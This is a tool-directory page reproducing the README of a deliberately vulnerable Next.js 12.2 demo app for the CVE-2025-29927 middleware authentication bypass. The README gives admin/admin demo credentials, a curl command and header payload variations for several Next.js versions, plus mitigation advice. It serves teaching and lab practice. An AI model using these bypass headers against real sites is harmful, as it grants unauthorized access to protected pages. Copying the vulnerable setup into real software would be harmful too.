Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
next-js-auth-bypass β€” πŸ”“ Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulnerability . ⚠️ For educational use only.[Made using Ai] | Kitploit
Tools/GitHubGitHub/kazuya256/next-js-auth-bypass
Authentication & AuthorizationVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubkazuya256/next-js-auth-bypass

next-js-auth-bypass

πŸ”“ Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulnerability . ⚠️ For educational use only.[Made using Ai]

View Repository
1141 year agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

Hello World - Next.js 12.2

A simple proof of concept Next.js 12.2 application.

πŸš€ Quick Start

1. Install Dependencies

npm install

2. Run the Development Server

npm run dev

The application will be available at http://localhost:3000

πŸ› οΈ Available Scripts

  • npm run dev - Start development server
  • npm run build - Build for production
  • npm run start - Start production server

🎯 Features

  • βœ… Next.js 12.2 - Latest stable version
  • βœ… React 18.2 - Modern React features
  • βœ… Simple Design - Clean, responsive UI
  • βœ… Authentication System - Login with hardcoded credentials
  • βœ… Admin Panel - Protected dashboard with sensitive data
  • βœ… Vulnerable Middleware - Demonstrates auth bypass techniques
  • βœ… Exploit Demo - Easy to reproduce security issues

πŸ”§ Customization

Edit pages/index.js to modify the Hello World page. The application uses inline styles for simplicity, but you can add CSS files or styling libraries as needed.

πŸ”“ CVE-2025-29927 Security Demo

This application demonstrates the CVE-2025-29927 vulnerability discovered by Rachid.A (zhero) and Yasser Allam (inzo_):

πŸ“‹ Vulnerability Details

  • CVE: CVE-2025-29927
  • CVSS: 9.1/10 (Critical)
  • Affected: Next.js 11.1.4 - 15.2.2
  • Impact: Complete middleware bypass using x-middleware-subrequest header

🎯 Demo Credentials

  • Username: admin
  • Password: admin

🚨 CVE-2025-29927 Exploit Methods

  1. Browser Extension (ModHeader) - Add x-middleware-subrequest: middleware header
  2. JavaScript Console - Use fetch with the bypass header
  3. cURL Exploit - curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
  4. Python Requests - Add header to bypass middleware completely

πŸ”§ Payload Variations

  • Next.js 12.2+: x-middleware-subrequest: middleware
  • With /src directory: x-middleware-subrequest: src/middleware
  • Next.js 15.x: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

πŸ›‘οΈ Mitigation

  • Update to Next.js 15.2.3+ (14.2.25+ for 14.x)
  • Block x-middleware-subrequest header at proxy/CDN level
  • Implement additional server-side validation

⚠️ WARNING: This demonstrates a real CVE for educational purposes only!

πŸ“¦ Dependencies

  • next: 12.2.0
  • react: 18.2.0
  • react-dom: 18.2.0

🎨 Styling

This application uses inline styles for simplicity. For a production app, consider using:

  • CSS Modules
  • Styled Components
  • Tailwind CSS
  • Or any other styling solution

Happy coding! πŸš€

Download Tool